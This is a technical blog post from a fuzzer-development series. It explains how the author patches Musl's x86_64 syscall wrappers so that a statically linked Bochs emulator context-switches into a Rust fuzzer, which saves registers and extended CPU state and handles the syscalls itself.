If you haven’t heard, we’re developing a fuzzer on the blog these days. I don’t even know if “fuzzer” is the right word for what we’re building, it’s almost more like an execution engine that will expose hooks? Anyways, if you missed the first episode you can catch up here. We are creating a fuzzer that loads a statically built Bochs emulator into itself, and executes Bochs logic while maintaining a sandbox for Bochs. You can think of it as, we were too lazy to implement our own x86_64 emulator from scratch so we’ve just literally taken a complete emulator and stuffed it into our own process to use it. The fuzzer is written in Rust and Bochs is a C++ codebase. Bochs is a full system emulator, so the devices and everything else is just simulated in software. This is great for us because we can simply snapshot and restore Bochs itself to achieve snapshot fuzzing of our target. So the fuzzer runs Bochs and Bochs runs our target. This allows us to snapshot fuzz arbitrarily complex targets: web browsers, kernels, network stacks, etc. This episode, we’ll delve into the concept of sandboxing Bochs from syscalls. We do not want Bochs to be capable of escaping its sandbox or retrieving any data from outside of our environment. So today we’ll get into the implementation details of my first stab at Bochs-to-fuzzer context switching to handle syscalls. In the future we will also need to implement context switching from fuzzer-to-Bochs as well, but for now let’s focus on syscalls.

This fuzzer was conceived of and implemented originally by Brandon Falk.

There will be no repo changes with this post.

Syscalls

Syscalls are a way for userland to voluntarily context switch to kernel-mode in order to utilize some kernel provided utility or function. Context switching simply means changing the context in which code is executing. When you’re adding integers, reading/writing memory, your process is executing in user-mode within your processes’ virtual address space. But if you want to open a socket or file, you need the kernel’s help. To do this, you make a syscall which will tell the processor to switch execution modes from user-mode to kernel-mode. In order to leave user-mode go to kernel-mode and then return to user-mode, a lot of care must be taken to accurately save the execution state at every step. Once you try to execute a syscall, the first thing the OS has to do is save your current execution state before it starts executing your requested kernel code, that way once the kernel is done with your request, it can return gracefully to executing your user-mode process.

Context-switching can be thought of as switching from executing one process to another. In our case, we’re switching from Bochs execution to Lucid execution. Bochs is doing it’s thing, reading/writing memory, doing arithmetic etc, but when it needs the kernel’s help it attempts to make a syscall. When this occurs we need to:

recognize that Bochs is trying to syscall, this isn’t always easy to do weirdly
intercept execution and redirect to the appropriate code path
save Bochs’ execution state
execute our Lucid logic in place of the kernel, think of Lucid as Bochs’ kernel
return gracefully to Bochs by restoring its state

C Library

Normally programmers don’t have to worry about making syscalls directly. They instead use functions that are defined and implemented in a C library instead, and its these functions that actually make the syscalls. You can think of these functions as wrappers around a syscall. For instance if you use the C library function for open, you’re not directly making a syscall, you’re calling into the library’s open function and that function is the one emitting a syscall instruction that actually peforms the context switch into the kernel. Doing things this way takes a lot of the portability work off of the programmer’s shoulders because the guts of the library functions perform all of the conditional checks for environmental variables and execute accordingly. Programmers just call the open function and don’t have to worry about things like syscall numbers, error handling, etc as those things are kept abstracted and uniform in the code exported to the programmer.

This provides a nice chokepoint for our purposes, since Bochs programmers also use C library functions instead of invoking syscalls directly. When Bochs wants to make a syscall, it’s going to call a C library function. This gives us an opportunity to intercept these syscalls before they are made. We can insert our own logic into these functions that check to see whether or not Bochs is executing under Lucid, if it is, we can insert logic that directs execution to Lucid instead of the kernel. In pseudocode we can achieve something like the following:

fn syscall()
  if lucid:
    lucid_syscall()
  else:
    normal_syscall()

Musl

Musl is a C library that is meant to be “lightweight.” This gives us some simplicity to work with vs. something like Glibc which is a monstrosity an affront to God. Importantly, Musl is reputationally great for static linking, which is what we need when we build our static PIE Bochs. So the idea here is that we can manually alter Musl code to change how syscall-invoking wrapper functions work so that we can hijack execution in a way that context-switches into Lucid rather than the kernel.

In this post we’ll be working with Musl 1.2.4 which is the latest version as of today.

Baby Steps

Instead of jumping straight into Bochs, we’ll be using a test program for the purposes of developing our first context-switching routines. This is just easier. The test program is this:

#include 
#include 
#include 

int main(int argc, char *argv[]) {
    printf("Argument count: %d\n", argc);
    printf("Args:\n");
    for (int i = 0; i < argc; i++) {
        printf("   -%s\n", argv[i]);
    }

    size_t iters = 0;
    while (1) {
        printf("Test alive!\n");
        sleep(1);
        iters++;

        if (iters == 5) { break; }
    }

    printf("g_lucid_ctx: %p\n", g_lucid_ctx);
}

The program will just tell us it’s argument count, each argument, live for ~5 seconds, and then print the memory address of a Lucid execution context data structure. This data structure will be allocated and initialized by Lucid if the program is running under Lucid, and it will be NULL otherwise. So how do we accomplish this?

Execution Context Tracking

Our problem is that we need a globally accessible way for the program we load (eventually Bochs) to tell whether or not its running under Lucid or running as normal. We also have to provide many data structures and function addresses to Bochs so we need a vehicle do that.

What I’ve done is I’ve just created my own header file and placed it in Musl called lucid.h. This file defines all of the Lucid-specific data structures we need Bochs to have access to when it’s compiled against Musl. So in the header file right now we’ve defined a lucid_ctx data structure, and we’ve also created a global instance of one called g_lucid_ctx:

// An execution context definition that we use to switch contexts between the
// fuzzer and Bochs. This should contain all of the information we need to track
// all of the mutable state between snapshots that we need such as file data.
// This has to be consistent with LucidContext in context.rs
typedef struct lucid_ctx {
    // This must always be the first member of this struct
    size_t exit_handler;
    int save_inst;
    size_t save_size;
    size_t lucid_save_area;
    size_t bochs_save_area;
    struct register_bank register_bank;
    size_t magic;
} lucid_ctx_t;

// Pointer to the global execution context, if running inside Lucid, this will
// point to the a struct lucid_ctx_t inside the Fuzzer 
lucid_ctx_t *g_lucid_ctx;

Program Start Under Lucid

So in Lucid’s main function right now we do the following:

Load Bochs
Create an execution context
Jump to Bochs’ entry point and start executing

When we jump to Bochs’ entry point, one of the earliest functions called is a function in Musl called _dlstart_c located in the source file dlstart.c. Right now, we create that global execution context in Lucid on the heap, and then we pass that address in arbitrarily chosen r15. This whole function will have to change eventually because we’ll want to context switch from Lucid to Bochs to perform this in the future, but for now this is all we do:

pub fn start_bochs(bochs: Bochs, context: Box<LucidContext>) {
    // rdx: we have to clear this register as the ABI specifies that exit
    // hooks are set when rdx is non-null at program start
    //
    // rax: arbitrarily used as a jump target to the program entry
    //
    // rsp: Rust does not allow you to use 'rsp' explicitly with in(), so we
    // have to manually set it with a `mov`
    //
    // r15: holds a pointer to the execution context, if this value is non-
    // null, then Bochs learns at start time that it is running under Lucid
    //
    // We don't really care about execution order as long as we specify clobbers
    // with out/lateout, that way the compiler doesn't allocate a register we 
    // then immediately clobber
    unsafe {
        asm!(
            "xor rdx, rdx",
            "mov rsp, {0}",
            "mov r15, {1}",
            "jmp rax",
            in(reg) bochs.rsp,
            in(reg) Box::into_raw(context),
            in("rax") bochs.entry,
            lateout("rax") _,   // Clobber (inout so no conflict with in)
            out("rdx") _,       // Clobber
            out("r15") _,       // Clobber
        );
    }
}

So when we jump to Bochs entry point having come from Lucid, r15 should hold the address of the execution context. In _dlstart_c, we can check r15 and act accordingly. Here are those additions I made to Musl’s start routine:

hidden void _dlstart_c(size_t *sp, size_t *dynv)
{
	// The start routine is handled in inline assembly in arch/x86_64/crt_arch.h
	// so we can just do this here. That function logic clobbers only a few
	// registers, so we can have the Lucid loader pass the address of the 
	// Lucid context in r15, this is obviously not the cleanest solution but
	// it works for our purposes
	size_t r15;
	__asm__ __volatile__(
		"mov %%r15, %0" : "=r"(r15)
	);

	// If r15 was not 0, set the global context address for the g_lucid_ctx that
	// is in the Rust fuzzer
	if (r15 != 0) {
		g_lucid_ctx = (lucid_ctx_t *)r15;

		// We have to make sure this is true, we rely on this
		if ((void *)g_lucid_ctx != (void *)&g_lucid_ctx->exit_handler) {
			__asm__ __volatile__("int3");
		}
	}

	// We didn't get a g_lucid_ctx, so we can just run normally
	else {
		g_lucid_ctx = (lucid_ctx_t *)0;
	}

When this function is called, r15 remains untouched by the earliest Musl logic. So we use inline assembly to extract the value into a variable called r15 and check it for data. If it has data, we set the global context variable to the address in r15; otherwise we explicitly set it to NULL and run as normal. Now with a global set, we can do runtime checks for our environment and optionally call into the real kernel or into Lucid.

Lobotomizing Musl Syscalls

Now with our global set, it’s time to edit the functions responsible for making syscalls. Musl is very well organized so finding the syscall invoking logic was not too difficult. For our target architecture, which is x86_64, those syscall invoking functions are in arch/x86_64/syscall_arch.h. They are organized by how many arguments the syscall takes:

static __inline long __syscall0(long n)
{
	unsigned long ret;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n) : "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall1(long n, long a1)
{
	unsigned long ret;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1) : "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall2(long n, long a1, long a2)
{
	unsigned long ret;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2)
						  : "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall3(long n, long a1, long a2, long a3)
{
	unsigned long ret;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3) : "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall4(long n, long a1, long a2, long a3, long a4)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10): "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall5(long n, long a1, long a2, long a3, long a4, long a5)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8 __asm__("r8") = a5;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10), "r"(r8) : "rcx", "r11", "memory");
	return ret;
}

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8 __asm__("r8") = a5;
	register long r9 __asm__("r9") = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10), "r"(r8), "r"(r9) : "rcx", "r11", "memory");
	return ret;
}

For syscalls, there is a well defined calling convention. Syscalls take a “syscall number” which determines what syscall you want in eax, then the next n parameters are passed in via the registers in order: rdi, rsi, rdx, r10, r8, and r9.

This is pretty intuitive but the syntax is a bit mystifying, like for example on those __asm__ __volatile__ ("syscall" lines, it’s kind of hard to see what it’s doing. Let’s take the most convoluted function, __syscall6 and break down all the syntax. We can think of the assembly syntax as a format string like for printing, but this is for emitting code instead:

unsigned long ret is where we will store the result of the syscall to indicate whether or not it was a success. In the raw assembly, we can see that there is a : and then "=a(ret)", this first set of parameters after the initial colon is to indicate output parameters. We are saying please store the result in eax (symbolized in the syntax as a) into the variable ret.
The next series of params after the next colon are input parameters. "a"(n) is saying, place the function argument n, which is the syscall number, into eax which is symbolized again as a. Next is store a1 in rdi, which is symbolized as D, and so forth
Arguments 4-6 are placed in registers above, for instance the syntax register long r10 __asm__("r10") = a4; is a strong compiler hint to store a4 into r10. And then later we see "r"(r10) says input the variable r10 into a general purpose register (which is already satisfied).
The last set of colon-separated values are known as “clobbers”. These tell the compiler what our syscall is expected to corrupt. So the syscall calling convention specifies that rcx, r11, and memory may be overwritten by the kernel.

With the syntax explained, we see what is taking place. The job of these functions is to translate the function call into a syscall. The calling convention for functions, known as the System V ABI, is different from that of a syscall, the register utilization differs. So when we call __syscall6 and pass its arguments, each argument is stored in the following register:

n → rax
a1 → rdi
a2 → rsi
a3 → rdx
a4 → rcx
a5 → r8
a6 → r9

So the compiler will take those function args from the System V ABI and translate them into the syscall via the assembly that we explained above. So now these are the functions we need to edit so that we don’t emit that syscall instruction and instead call into Lucid.

Conditionally Calling Into Lucid

So we need a way in these function bodies to call into Lucid instead of emit syscall instructions. To do so we need to define our own calling convention, for now I’ve been using the following:

r15: contains the address of the global Lucid execution context
r14: contains an “exit reason” which is just an enum explaining why we are context switching
r13: is the base address of the register bank structure of the Lucid execution context, we need this memory section to store our register values to save our state when we context switch
r12: stores the address of the “exit handler” which is the function to call to context switch

This will no doubt change some as we add more features/functionality. I should also note that it is the functions responibility to preserve these values according to the ABI, so the function caller expects that these won’t change during a function call, well we are changing them. That’s ok because in the function where we use them, we are marking them as clobbers, remember? So the compiler is aware that they change, what the compiler is going to do now is before it executes any code, it’s going to push those registers onto the stack to save them, and then before exiting, pop them back into the registers so that the caller gets back the expected values. So we’re free to use them.

So to alter the functions, I changed the function logic to first check if we have a global Lucid execution context, if we do not, then execute the normal Musl function, you can see that here as I’ve moved the normal function logic out to a separate function called __syscall6_original:

static __inline long __syscall6_original(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8  __asm__("r8")  = a5;
	register long r9  __asm__("r9")  = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2), "d"(a3), "r"(r10),
							"r"(r8), "r"(r9) : "rcx", "r11", "memory");

	return ret;
}

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	if (!g_lucid_ctx) { return __syscall6_original(n, a1, a2, a3, a4, a5, a6); }

However, if we are running under Lucid, I set up our calling convention by explicitly setting the registers r12-r15 in accordance to what we are expecting there when we context-switch to Lucid.

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
    if (!g_lucid_ctx) { return __syscall6_original(n, a1, a2, a3, a4, a5, a6); }
	
    register long ret;
    register long r12 __asm__("r12") = (size_t)(g_lucid_ctx->exit_handler);
    register long r13 __asm__("r13") = (size_t)(&g_lucid_ctx->register_bank);
    register long r14 __asm__("r14") = SYSCALL;
    register long r15 __asm__("r15") = (size_t)(g_lucid_ctx);

Now with our calling convention set up, we can then use inline assembly as before. Notice we’ve replaced the syscall instruction with call r12, calling our exit handler as if it’s a normal function:

__asm__ __volatile__ (
        "mov %1, %%rax\n\t"
	"mov %2, %%rdi\n\t"
	"mov %3, %%rsi\n\t"
	"mov %4, %%rdx\n\t"
	"mov %5, %%r10\n\t"
	"mov %6, %%r8\n\t"
	"mov %7, %%r9\n\t"
        "call *%%r12\n\t"
        "mov %%rax, %0\n\t"
        : "=r" (ret)
        : "r" (n), "r" (a1), "r" (a2), "r" (a3), "r" (a4), "r" (a5), "r" (a6),
		  "r" (r12), "r" (r13), "r" (r14), "r" (r15)
        : "rax", "rcx", "r11", "memory"
    );
	
	return ret;

So now we’re calling the exit handler instead of syscalling into the kernel, and all of the registers are setup as if we’re syscalling. We’ve also got our calling convention registers set up. Let’s see what happens when we land on the exit handler, a function that is implemented in Rust inside Lucid. We are jumping from Bochs code directly to Lucid code!

Implementing a Context Switch

The first thing we need to do is create a function body for the exit handler. In Rust, we can make the function visible to Bochs (via our edited Musl) by declaring the function as an extern C function and giving it a label in inline assembly as such:

extern "C" { fn exit_handler(); }
global_asm!(
    ".global exit_handler",
    "exit_handler:",

So this function is what will be jumped to by Bochs when it tries to syscall under Lucid. The first thing we need to consider is that we need to keep track of Bochs’ state the way the kernel would upon entry to the context switching routine. The first thing we’ll want to save off is the general purpose registers. By doing this, we can preserve the state of the registers, but also unlock them for our own use. Since we save them first, we’re then free to use them. Remember that our calling convention uses r13 to store the base address of the execution context register bank:

#[repr(C)]
#[derive(Default, Clone)]
pub struct RegisterBank {
    pub rax:    usize,
    rbx:        usize,
    rcx:        usize,
    pub rdx:    usize,
    pub rsi:    usize,
    pub rdi:    usize,
    rbp:        usize,
    rsp:        usize,
    pub r8:     usize,
    pub r9:     usize,
    pub r10:    usize,
    r11:        usize,
    r12:        usize,
    r13:        usize,
    r14:        usize,
    r15:        usize,
}

We can save the register values then by doing this:

// Save the GPRS to memory
"mov [r13 + 0x0], rax",
"mov [r13 + 0x8], rbx",
"mov [r13 + 0x10], rcx",
"mov [r13 + 0x18], rdx",
"mov [r13 + 0x20], rsi",
"mov [r13 + 0x28], rdi",
"mov [r13 + 0x30], rbp",
"mov [r13 + 0x38], rsp",
"mov [r13 + 0x40], r8",
"mov [r13 + 0x48], r9",
"mov [r13 + 0x50], r10",
"mov [r13 + 0x58], r11",
"mov [r13 + 0x60], r12",
"mov [r13 + 0x68], r13",
"mov [r13 + 0x70], r14",
"mov [r13 + 0x78], r15",

This will save the register values to memory in the memory bank for preservation. Next, we’ll want to preserve the CPU’s flags, luckily there is a single instruction for this purpose which pushes the flag values to the stack called pushfq.

We’re using a pure assembly stub right now but we’d like to start using Rust at some point, that point is now. We have saved all the state we can for now, and it’s time to call into a real Rust function that will make programming and implementation easier. To call into a function though, we need to set up the register values to adhere to the function calling ABI remember. Two pieces of data that we want to be accessible are the execution context and the reason why we exited. Those are in r15 and r14 respectively remember. So we can simply place those into the registers used for passing function arguments and call into a Rust function called lucid_handler now.

// Save the CPU flags
"pushfq",

// Set up the function arguments for lucid_handler according to ABI
"mov rdi, r15", // Put the pointer to the context into RDI
"mov rsi, r14", // Put the exit reason into RSI

// At this point, we've been called into by Bochs, this should mean that 
// at the beginning of our exit_handler, rsp was only 8-byte aligned and
// thus, by ABI, we cannot legally call into a Rust function since to do so
// requires rsp to be 16-byte aligned. Luckily, `pushfq` just 16-byte
// aligned the stack for us and so we are free to `call`
"call lucid_handler",

So now, we are free to execute real Rust code! Here is lucid_handler as of now:

// This is where the actual logic is for handling the Bochs exit, we have to 
// use no_mangle here so that we can call it from the assembly blob. We need
// to see why we've exited and dispatch to the appropriate function
#[no_mangle]
fn lucid_handler(context: *mut LucidContext, exit_reason: i32) {
    // We have to make sure this bad boy isn't NULL 
    if context.is_null() {
        println!("LucidContext pointer was NULL");
        fatal_exit();
    }

    // Ensure that we have our magic value intact, if this is wrong, then we 
    // are in some kind of really bad state and just need to die
    let magic = LucidContext::ptr_to_magic(context);
    if magic != CTX_MAGIC {
        println!("Invalid LucidContext Magic value: 0x{:X}", magic);
        fatal_exit();
    }

    // Before we do anything else, save the extended state
    let save_inst = LucidContext::ptr_to_save_inst(context);
    if save_inst.is_err() {
        println!("Invalid Save Instruction");
        fatal_exit();
    }
    let save_inst = save_inst.unwrap();

    // Get the save area
    let save_area =
        LucidContext::ptr_to_save_area(context, SaveDirection::FromBochs);

    if save_area == 0 || save_area % 64 != 0 {
        println!("Invalid Save Area");
        fatal_exit();
    }

    // Determine save logic
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) } as u64;

            // Call xsave to save the extended state to Bochs save area
            unsafe { _xsave64(save_area as *mut u8, xcr0); }             
        },
        SaveInst::FxSave64 => {
            // Call fxsave to save the extended state to Bochs save area
            unsafe { _fxsave64(save_area as *mut u8); }
        },
        _ => (), // NoSave
    }

    // Try to convert the exit reason into BochsExit
    let exit_reason = BochsExit::try_from(exit_reason);
    if exit_reason.is_err() {
        println!("Invalid Bochs Exit Reason");
        fatal_exit();
    }
    let exit_reason = exit_reason.unwrap();
    
    // Determine what to do based on the exit reason
    match exit_reason {
        BochsExit::Syscall => {
            syscall_handler(context);
        },
    }

    // Restore extended state, determine restore logic
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) } as u64;

            // Call xrstor to restore the extended state from Bochs save area
            unsafe { _xrstor64(save_area as *const u8, xcr0); }             
        },
        SaveInst::FxSave64 => {
            // Call fxrstor to restore the extended state from Bochs save area
            unsafe { _fxrstor64(save_area as *const u8); }
        },
        _ => (), // NoSave
    }
}

There are a few important pieces here to discuss.

Extended State

Let’s start with this concept of the save area. What is that? Well, we already have a general purpose registers saved and our CPU flags, but there is what’s called an “extended state” of the processor that we haven’t saved. This can include the floating-point registers, vector registers, and other state information used by the processor to support advanced execution features like SIMD (Single Instruction, Multiple Data) instructions, encryption, and other stuff like control registers. Is this important? It’s hard to say, we don’t know wtf Bochs will do, it might count on these to be preserved across function calls so I thought we’d go ahead and do it.

To save this state, you just execute the appropriate saving instruction for your CPU. To do this somewhat dynamically at runtime, I just query the processor for at least two saving instructions to see if they’re available, if they’re not, for now, we don’t support anything else. So when we create the execution context initially, we determine what save instruction we’ll need and store that answer in the execution context. Then on a context switch, we can dynamically use the approriate extended state saving function. This works because we don’t use any of the extended state in lucid_handler yet so it’s preserved still. You can see how I checked during context initialization here:

pub fn new() -> Result<Self, LucidErr> {
        // Check for what kind of features are supported we check from most 
        // advanced to least
        let save_inst = if std::is_x86_feature_detected!("xsave") {
            SaveInst::XSave64
        } else if std::is_x86_feature_detected!("fxsr") {
            SaveInst::FxSave64
        } else {
            SaveInst::NoSave
        };

        // Get save area size
        let save_size: usize = match save_inst {
            SaveInst::NoSave => 0,
            _ => calc_save_size(),
        };

The way this works is the processor takes a pointer to memory where you want it saved and also how much you want saved, like what specific states. I just maxed out the amount of state I want saved and asked the CPU how much memory that would be:

// Standalone function to calculate the size of the save area for saving the 
// extended processor state based on the current processor's features. `cpuid` 
// will return the save area size based on the value of the XCR0 when ECX==0
// and EAX==0xD. The value returned to EBX is based on the current features
// enabled in XCR0, while the value returned in ECX is the largest size it
// could be based on CPU capabilities. So out of an abundance of caution we use
// the ECX value. We have to preserve EBX or rustc gets angry at us. We are
// assuming that the fuzzer and Bochs do not modify the XCR0 at any time.  
fn calc_save_size() -> usize {
    let save: usize;
    unsafe {
        asm!(
            "push rbx",
            "mov rax, 0xD",
            "xor rcx, rcx",
            "cpuid",
            "pop rbx",
            out("rax") _,       // Clobber
            out("rcx") save,    // Save the max size
            out("rdx") _,       // Clobbered by CPUID output (w eax)
        );
    }

    // Round up to the nearest page size
    (save + PAGE_SIZE - 1) & !(PAGE_SIZE - 1)
}

I page align the result and then map that memory during execution context initialization and save the memory address to the execution state. Now at run time in lucid_handler we can save the extended state:

// Determine save logic
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) } as u64;

            // Call xsave to save the extended state to Bochs save area
            unsafe { _xsave64(save_area as *mut u8, xcr0); }             
        },
        SaveInst::FxSave64 => {
            // Call fxsave to save the extended state to Bochs save area
            unsafe { _fxsave64(save_area as *mut u8); }
        },
        _ => (), // NoSave
    }

Right now, all we’re handling for exit reasons are syscalls, so we invoke our syscall handler and then restore the extended state before returning back to the exit_handler assembly stub:

// Determine what to do based on the exit reason
    match exit_reason {
        BochsExit::Syscall => {
            syscall_handler(context);
        },
    }

    // Restore extended state, determine restore logic
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) } as u64;

            // Call xrstor to restore the extended state from Bochs save area
            unsafe { _xrstor64(save_area as *const u8, xcr0); }             
        },
        SaveInst::FxSave64 => {
            // Call fxrstor to restore the extended state from Bochs save area
            unsafe { _fxrstor64(save_area as *const u8); }
        },
        _ => (), // NoSave
    }

Let’s see how we handle syscalls.

Implementing Syscalls

When we run the test program normally, not under Lucid, we get the following output:

Argument count: 1
Args:
   -./test
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
g_lucid_ctx: 0

And when we run it with strace, we can see what syscalls are made:

execve("./test", ["./test"], 0x7ffca76fee90 /* 49 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd53887f5b8) = 0
set_tid_address(0x7fd53887f7a8)         = 850649
ioctl(1, TIOCGWINSZ, {ws_row=40, ws_col=110, ws_xpixel=0, ws_ypixel=0}) = 0
writev(1, [{iov_base="Argument count: 1", iov_len=17}, {iov_base="\n", iov_len=1}], 2Argument count: 1
) = 18
writev(1, [{iov_base="Args:", iov_len=5}, {iov_base="\n", iov_len=1}], 2Args:
) = 6
writev(1, [{iov_base="   -./test", iov_len=10}, {iov_base="\n", iov_len=1}], 2   -./test
) = 11
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="g_lucid_ctx: 0", iov_len=14}, {iov_base="\n", iov_len=1}], 2g_lucid_ctx: 0
) = 15
exit_group(0)                           = ?
+++ exited with 0 +++

We see that the first two syscalls are involved with process creation, we don’t need to worry about those our process is already created and loaded in memory. The other syscalls are ones we’ll need to handle, things like set_tid_address, ioctl, and writev. We don’t worry about exit_group yet as that will be a fatal exit condition because Bochs shouldn’t exit if we’re snapshot fuzzing.

So we can use our saved register bank information to extract the syscall number from eax and dispatch to the appropriate syscall function! You can see that logic here:

// This is where we process Bochs making a syscall. All we need is a pointer to
// the execution context, and we can then access the register bank and all the
// peripheral structures we need
#[allow(unused_variables)]
pub fn syscall_handler(context: *mut LucidContext) {
    // Get a handle to the register bank
    let bank = LucidContext::get_register_bank(context);

    // Check what the syscall number is
    let syscall_no = (*bank).rax;

    // Get the syscall arguments
    let arg1 = (*bank).rdi;
    let arg2 = (*bank).rsi;
    let arg3 = (*bank).rdx;
    let arg4 = (*bank).r10;
    let arg5 = (*bank).r8;
    let arg6 = (*bank).r9;

    match syscall_no {
        // ioctl
        0x10 => {
            //println!("Handling ioctl()...");
            // Make sure the fd is 1, that's all we handle right now?
            if arg1 != 1 {
                println!("Invalid `ioctl` fd: {}", arg1);
                fatal_exit();
            }

            // Check the `cmd` argument
            match arg2 as u64 {
                // Requesting window size
                libc::TIOCGWINSZ => {   
                    // Arg 3 is a pointer to a struct winsize
                    let winsize_p = arg3 as *mut libc::winsize;

                    // If it's NULL, return an error, we don't set errno yet
                    // that's a weird problem
                    // TODO: figure out that whole TLS issue yikes
                    if winsize_p.is_null() {
                        (*bank).rax = usize::MAX;
                        return;
                    }

                    // Deref the raw pointer
                    let winsize = unsafe { &mut *winsize_p };

                    // Set to some constants
                    winsize.ws_row      = WS_ROW;
                    winsize.ws_col      = WS_COL;
                    winsize.ws_xpixel   = WS_XPIXEL;
                    winsize.ws_ypixel   = WS_YPIXEL;

                    // Return success
                    (*bank).rax = 0;
                },
                _ => {
                    println!("Unhandled `ioctl` argument: 0x{:X}", arg1);
                    fatal_exit();
                }
            }
        },
        // writev
        0x14 => {
            //println!("Handling writev()...");
            // Get the fd
            let fd = arg1 as libc::c_int;

            // Make sure it's an fd we handle
            if fd != STDOUT {
                println!("Unhandled writev fd: {}", fd);
            }

            // An accumulator that we return
            let mut bytes_written = 0;

            // Get the iovec count
            let iovcnt = arg3 as libc::c_int;

            // Get the pointer to the iovec
            let mut iovec_p = arg2 as *const libc::iovec;

            // If the pointer was NULL, just return error
            if iovec_p.is_null() {
                (*bank).rax = usize::MAX;
                return;
            }

            // Iterate through the iovecs and write the contents
            green!();
            for i in 0..iovcnt {
                bytes_written += write_iovec(iovec_p);

                // Update iovec_p
                iovec_p = unsafe { iovec_p.offset(1 + i as isize) };
            }
            clear!();

            // Update return value
            (*bank).rax = bytes_written;
        },
        // nanosleep
        0x23 => {
            //println!("Handling nanosleep()...");
            (*bank).rax = 0;
        },
        // set_tid_address
        0xDA => {
            //println!("Handling set_tid_address()...");
            // Just return Boch's pid, no need to do anything
            (*bank).rax = BOCHS_PID as usize;
        },
        _ => {
            println!("Unhandled Syscall Number: 0x{:X}", syscall_no);
            fatal_exit();
        }
    }
}

That’s about it! It’s kind of fun acting as the kernel. Right now our test program doesn’t do much, but I bet we’re going to have to figure out how to deal with things like files and such when using Bochs, but that’s a different time. Now all there is to do, after setting the return code via rax, is return back to the exit_handler stub and back to Bochs gracefully.

Returning Gracefully

    // Restore the flags
    "popfq",

    // Restore the GPRS
    "mov rax, [r13 + 0x0]",
    "mov rbx, [r13 + 0x8]",
    "mov rcx, [r13 + 0x10]",
    "mov rdx, [r13 + 0x18]",
    "mov rsi, [r13 + 0x20]",
    "mov rdi, [r13 + 0x28]",
    "mov rbp, [r13 + 0x30]",
    "mov rsp, [r13 + 0x38]",
    "mov r8, [r13 + 0x40]",
    "mov r9, [r13 + 0x48]",
    "mov r10, [r13 + 0x50]",
    "mov r11, [r13 + 0x58]",
    "mov r12, [r13 + 0x60]",
    "mov r13, [r13 + 0x68]",
    "mov r14, [r13 + 0x70]",
    "mov r15, [r13 + 0x78]",

    // Return execution back to Bochs!
    "ret"

We restore the CPU flags, restore the general purpose registers, and then we simple ret like we’re done with the function call. Don’t forget we already restored the extended state before within lucid_context before returning from that function.

Conclusion

And just like that, we have an infrastructure that is capable of handling context switches from Bochs to the fuzzer. It will no doubt change and need to be refactored, but the ideas will remain similar. We can see the output below demonstrates the test program running under Lucid with us handling the syscalls ourselves:

[08:15:56] lucid> Loading Bochs...
[08:15:56] lucid> Bochs mapping: 0x10000 - 0x18000
[08:15:56] lucid> Bochs mapping size: 0x8000
[08:15:56] lucid> Bochs stack: 0x7F8A50FCF000
[08:15:56] lucid> Bochs entry: 0x11058
[08:15:56] lucid> Creating Bochs execution context...
[08:15:56] lucid> Starting Bochs...
Argument count: 4
Args:
   -./bochs
   -lmfao
   -hahahah
   -yes!
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
g_lucid_ctx: 0x55f27f693cd0
Unhandled Syscall Number: 0xE7

Next Up?

Next we will compile Bochs against Musl and work on getting it to work. We’ll need to implement all of its syscalls as well as get it running a test target that we’ll want to snapshot and run over and over. So the next blogpost should be a Bochs that is syscall-sandboxed snapshotting and rerunning a hello world type target. Until then!

